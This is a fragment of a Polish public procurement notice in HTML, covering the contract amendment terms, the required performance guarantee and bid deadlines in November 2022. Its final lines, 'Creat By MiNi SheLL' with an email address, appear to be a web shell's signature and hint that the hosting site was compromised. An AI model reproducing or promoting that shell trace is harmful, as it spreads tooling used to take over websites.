dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie - wykaz stanowi załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> kosztorys ofertowy składany wraz z ofertą <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienie zostały opisane w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazane są zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, chyba że wystąpią okoliczności, które przemawiają za koniecznością zmiany postanowień umowy. <br/><br/>2. Zamawiający dopuszcza zmiany postanowień zawartej umowy w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy w następujących przypadkach:<br/><br/>a) wystąpienia niekorzystnych warunków atmosferycznych powodujących konieczność<br/>przerwania robót, potwierdzoną przez przedstawiciela Zamawiającego w oparciu <br/>o sporządzoną notatkę służbową. Zamawiający dopuszcza możliwość przedłużenia terminu przewidzianego na realizację zamówienia, o ilość dni w których te warunki wystąpią (opady, zbyt niskie temperatury),<br/><br/>b) zmiany warunków realizacji zamówienia z przyczyn, których nie można było przewidzieć przed zawarciem umowy, wystąpienia w czasie realizacji i na terenie objętym czynnościami Wykonawcy robót klęski żywiołowej oraz zmian w zasadach finansowania. Zamawiający dopuszcza możliwość przedłużenia tego terminu o okres niezbędny do realizacji tych robót,<br/><br/>c) wstrzymania robót lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego lub osób trzecich (w tym również trudnej sytuacji finansowej Zamawiającego spowodowanej mniejszymi niż planowane dochodami budżetowymi),<br/><br/>d) konieczności uzyskania dodatkowych uzgodnień i opinii od organów lub podmiotów,<br/><br/>2. Wskazane powyżej zmiany mogą być wprowadzone jedynie w przypadku jeżeli obydwie strony umowy zgodnie uznają, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia. W/w zmiany wymagają sporządzenia <br/>i zawarcia aneksu do umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Smart PZP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-18 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-17</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com